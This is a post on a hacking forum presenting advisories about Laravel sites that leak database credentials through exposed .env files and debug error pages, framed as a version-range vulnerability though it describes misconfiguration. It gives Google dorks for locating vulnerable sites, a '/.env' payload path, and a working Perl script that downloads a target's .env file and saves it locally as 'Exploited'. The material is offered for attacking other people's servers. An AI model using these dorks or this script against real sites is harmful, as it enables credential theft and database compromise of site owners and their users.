Laravel 9.47.0 Information Disclosure Vulnerability | General Hacking | Crax

Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!
  • We are in solidarity with our brothers and sisters in Palestine. Free Palestine. To learn more visit this Page

  • Crax.Pro domain has been taken down!

    Alternatives: Craxpro.io | Craxpro.com

Laravel 9.47.0 Information Disclosure Vulnerability

Laravel 9.47.0 Information Disclosure Vulnerability

LV
1
 

indoushka

Member
Joined
Dec 28, 2022
Threads
10
Likes
5
Awards
4
Website
packetstormsecurity.com
Credits
812©
Cash
0$

====================================================================================================================================
| # Title : Laravel from Version 1.0 to 9.47.0 MySQL Credential Disclosure Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) |
| # Vendor : https://laravel.com/ |
| # Dork : db_password filetype:env |
"Whoops! There was an error." |
====================================================================================================================================

note :

[+] 1 :

Laravel's default .env file contains some common configuration values that may differ based on whether your application
is running locally or on a production web server. These values are then retrieved from various Laravel configuration files
within the config directory using Laravel's env function.

[+] 2 : This framework In case you do not set a page for error it displays sensitive information about hosting passwords, databases ... etc

[+] Poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Use Payload : /.env = ( Depending on the server's protection, the result of viewing the file is either direct viewing or downloading the file Or not give you anything )

[+] https://127.0.0.1/lala/.env

====================================================================================================================================
| # Title : Laravel from Version 1.0 to 9.47.0 sensitive information disclosure Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) |
| # Vendor : https://laravel.com/ |
| # Dork : "Whoops! There was an error." |
====================================================================================================================================

poc :


[+] This framework In case you do not set a page for error it displays sensitive information about hosting passwords, databases ... etc

[+] Dorking İn Google Or Other Search Enggine .

[+] https://127.0.0.1/lalaland/categorie/avant_apres/

[+]

====================================================================================================================================
| # Title : Laravel from Version 1.0 to 9.47.0 Database Disclosure Exploit |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) |
| # Vendor : https://laravel.com |
| # Dork : |
====================================================================================================================================

poc :

[-] Download the configuration file:

The following Perl exploit will attempt to download the .env file
The .env file contains some common configuration values and connection information to the script database
Through the code you can control where to save the downloaded file .

[+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w
# Author : indoushka

use LWP::Simple;
use LWP::UserAgent;

system('cls');
print "\n[+] Laravel from Version 1.0 to 9.47.0 Database Disclosure [+] \n\n";
system('color a');


if(@ARGV < 2)
{
print "[+] Author : indoushka \n\n";
print "[-] How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/.env \n";
print "[+] usage2 : perl $0 localhost /.env \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File=".env";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/.env");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/.env\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Top Bottom